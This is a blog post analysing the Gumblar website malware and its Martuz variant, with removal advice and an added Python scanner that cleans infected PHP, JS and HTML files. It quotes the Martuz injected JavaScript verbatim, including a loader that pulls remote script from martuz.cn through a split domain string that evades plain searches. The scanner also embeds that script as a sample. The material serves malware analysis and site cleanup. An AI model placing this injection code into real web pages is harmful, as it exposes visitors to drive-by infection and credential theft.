Saturday, December 31, 2011

Gumblar - another dangerous virus

Gumblar

With Conficker slowly but surely ceding its crown as the most talked-about virus of 2009, Gumblar is steadily gaining attention as the new superstar virus. The Gumblar attack first relies on compromising normally legitimate websites and planting malicious scripts on them. US-CERT reports that stolen FTP credentials are reckoned to be the main technique in play during this stage of the attack, but poor configuration settings and vulnerable web applications might also play a part. Surfers who visit compromised websites are exposed to attacks that rely on well-known PDF and Flash Player vulnerabilities to plant malware onto Windows PCs. According to early findings from ongoing analysis, this malware is designed to redirect Google search results as well as to swipe sensitive information from compromised machines.


Gumblar Aliases and Variants
Gumblar is also known as Troj/JSRedir-R. A recent variant is called Martuz.

Gumblar Summary

Steals FTP credentials
Sends SPAM
Installs fake antivirus
Hijacks Google search queries
Disables security software

How To Remove Gumblar

The simplest way to remove Gumblar is to revert your website to a previous clean state, or to look through all your PHP, JS and HTML files and clean them manually. After that, reset your FTP credentials. The order is very important: do not reset FTP credentials before cleaning the website, because this would only result in Gumblar stealing your new FTP password.

Martuz

As the Gumblar.cn domain was taken off the web, the Gumblar hackers came up with a new variant, Martuz. The new script injects a new version that loads malicious content from a new domain, martuz.cn.
The Martuz script code is below:
// Comments added for explanation; the script lines themselves are as quoted, with the duplicated document.write fragment removed
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
// Runs only for non-Chrome browsers on Windows whose user agent lacks "NT 6" (Vista/7), skips hosts already marked with the miek=1 cookie, and uses the zrvzts global as a once-per-page guard
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
// Builds the ScriptEngine major/minor/build version string through eval and passes it to the loader as the id= parameter
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
// The domain is written as "martu"+"z.cn", so a plain search for martuz.cn in the page source misses it
document.write("<script src='http://martu"+"z.cn/vid/?id="+j+"'><\/script>");}

Martuz Aliases and Variants

Martuz is a variant of Gumblar, which is also known as Troj/JSRedir-R.

Martuz Summary

Steals FTP credentials
Sends SPAM
Installs fake antivirus
Hijacks Google search queries
Disables security software

How To Remove Martuz

The simplest way to remove Martuz is to revert your website to a previous clean state, or to look through all your PHP, JS and HTML files and clean them manually. After that, reset your FTP credentials. The order is very important: do not reset FTP credentials before cleaning the website, because this would only result in Gumblar stealing your new FTP password.
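As an added example (not the post's own code or any tool it mentions), the following Python script implements the clean-first, reset-second order described above for both Gumblar and Martuz, and also shows why the split domain string in the Martuz script ("martu"+"z.cn") defeats a plain text search: it collapses JavaScript string concatenations before matching, removes matching <script> blocks whole, flags injections it cannot safely cut, and allows the FTP credential reset only once a second scan over the site finds nothing. The indicators are the ones this post names (gumblar.cn, martuz.cn, the ScriptEngine/eval/document.write shape of the script); the sample site, its file names and the regular expressions are constructed assumptions for the demonstration.

```python
"""Added example, not code from the original post: scan a site's PHP/JS/HTML
files for a Gumblar/Martuz-style injected script, strip it, re-scan, and only
then clear the "reset FTP credentials" step.  Indicators are those the post
quotes; the site files below are constructed for the demonstration."""
import os
import re
import tempfile

# Collapse JavaScript string concatenation such as "martu"+"z.cn" into
# "martuz.cn"; the split domain is what lets the injection dodge a plain grep.
_CONCAT_DQ = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
_CONCAT_SQ = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# Domains named on the page plus the injected script's structural fingerprint
# (a heuristic: legitimate code can match it too, so review every hit).
_DOMAINS = re.compile(r"(gumblar|martuz)\.cn", re.I)
_FINGERPRINT = re.compile(r"ScriptEngine.*?eval\(.*?document\.write", re.S)
_SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.S | re.I)
_WEB_EXTENSIONS = {".php", ".js", ".html", ".htm"}

# Constructed sample built from the Martuz script quoted on the page.
INJECTED = r'''<script>var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src='http://martu"+"z.cn/vid/?id="+j+"'><\/script>");}</script>'''

def deobfuscate_concats(js: str) -> str:
    """Join adjacent quoted literals until the text stops changing."""
    prev = None
    while prev != js:
        prev = js
        js = _CONCAT_DQ.sub(lambda m: f'"{m.group(1)}{m.group(2)}"', js)
        js = _CONCAT_SQ.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", js)
    return js

def is_infected(text: str) -> bool:
    plain = deobfuscate_concats(text)
    return bool(_DOMAINS.search(plain) or _FINGERPRINT.search(plain))

def clean_text(text: str):
    """Return (cleaned, removed_blocks, needs_manual_review).  Matching <script>
    blocks are dropped whole; a hit outside any script tag is only reported."""
    removed = []

    def drop_if_malicious(m):
        if is_infected(m.group(0)):
            removed.append(m.group(0))
            return ""
        return m.group(0)

    cleaned = _SCRIPT_BLOCK.sub(drop_if_malicious, text)
    return cleaned, removed, is_infected(cleaned)

def _web_files(root):
    """Yield (slash-separated relative path, absolute path) for each web file."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in _WEB_EXTENSIONS:
                path = os.path.join(dirpath, name)
                yield os.path.relpath(path, root).replace(os.sep, "/"), path

def _read(path: str) -> str:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()

def write_file(root: str, rel: str, content: str) -> str:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)
    return path

def cleanup_site(root: str) -> dict:
    """Clean every web file under root, then re-scan; the FTP credential reset
    is allowed only when the second pass finds nothing, because a script left
    in place would simply harvest the new password."""
    report = {"cleaned": [], "manual_review": []}
    for rel, path in _web_files(root):
        text = _read(path)
        if not is_infected(text):
            continue
        cleaned, removed, manual = clean_text(text)
        if removed:
            write_file(root, rel, cleaned)
            report["cleaned"].append(rel)
        if manual:
            report["manual_review"].append(rel)
    report["still_infected"] = [r for r, p in _web_files(root) if is_infected(_read(p))]
    report["credential_reset_allowed"] = not report["still_infected"]
    return report

def build_sample_site() -> str:
    """Write a constructed three-file site into a temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="gumblar_demo_")
    write_file(root, "index.html", "<html><body><h1>Shop</h1>" + INJECTED + "</body></html>")
    write_file(root, "about.php", "<?php echo 'clean page'; ?>\n<script>var x = 1 + 2;</script>")
    write_file(root, "js/lib.js", "function f(){}\n" + INJECTED[len("<script>"):-len("</script>")])
    return root

if __name__ == "__main__":
    print(cleanup_site(build_sample_site()))
```

Running the file builds the temporary sample site and prints the report: the first pass strips the injected block from index.html, leaves about.php untouched, and lists js/lib.js for manual review because the same code was appended there without a script tag, so credential_reset_allowed stays False until that file is fixed by hand and cleanup_site is run again.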
